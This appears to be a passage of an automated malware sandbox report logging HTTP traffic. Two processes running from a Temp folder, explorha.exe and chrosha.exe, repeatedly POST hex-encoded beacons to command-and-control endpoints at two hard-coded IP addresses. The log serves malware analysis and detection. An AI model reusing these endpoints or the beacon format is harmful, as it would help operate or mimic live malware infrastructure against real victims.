                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.619539976 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      528 | 192.168.2.5 | 50373 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.467001915 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.718770981 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      529 | 192.168.2.5 | 50374 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.970690966 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:25.209656000 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      530 | 192.168.2.5 | 50375 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:25.082505941 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:25.326054096 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      531 | 192.168.2.5 | 50376 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:25.461373091 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:25.713660955 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
532 | 192.168.2.5 | 50377 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:25.574251890 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:25.824208021 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
533 | 192.168.2.5 | 50378 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:26.077305079 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:26.329679966 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
534 | 192.168.2.5 | 50379 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:26.178901911 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:26.424182892 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
535 | 192.168.2.5 | 50380 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:26.586277008 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:26.844441891 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
536 | 192.168.2.5 | 50381 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:26.673719883 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:26.921539068 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
537 | 192.168.2.5 | 50382 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:27.223351955 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:27.476679087 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
538 | 192.168.2.5 | 50383 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:27.275361061 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:27.522288084 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
539 | 192.168.2.5 | 50384 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:27.723212004 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:27.972114086 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
540 | 192.168.2.5 | 50385 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:27.774044991 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:28.020169020 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
541 | 192.168.2.5 | 50386 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:28.332118988 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:28.576206923 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
542 | 192.168.2.5 | 50387 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:28.377913952 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:28.624866009 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
543 | 192.168.2.5 | 50388 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:28.835767031 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:29.085215092 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
544 | 192.168.2.5 | 50389 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:28.871520042 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:29.116163015 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
545 | 192.168.2.5 | 50390 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:29.434799910 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:29.677577019 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
546 | 192.168.2.5 | 50391 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:29.465657949 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:29.709728003 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
547 | 192.168.2.5 | 50392 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
